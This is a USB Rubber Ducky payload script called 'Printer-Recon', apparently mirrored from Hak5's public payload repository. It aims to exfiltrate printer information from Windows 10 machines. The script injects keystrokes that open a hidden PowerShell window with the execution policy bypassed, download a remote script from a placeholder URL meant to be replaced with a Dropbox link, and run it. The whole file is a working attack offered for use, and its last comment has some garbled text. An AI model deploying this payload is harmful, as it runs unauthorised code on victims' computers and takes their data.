Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/Printer-Recon/payload.txt
2968 views
1
REM Title: Printer-Recon
2
3
REM Author: atomiczsec
4
5
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
6
7
REM Target: Windows 10
8
9
DEFINE TARGET_URL example.com
10
11
12
13
DELAY 2000
14
GUI r
15
DELAY 500
16
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
17
ENTER
18
19
REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant
20
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
21
22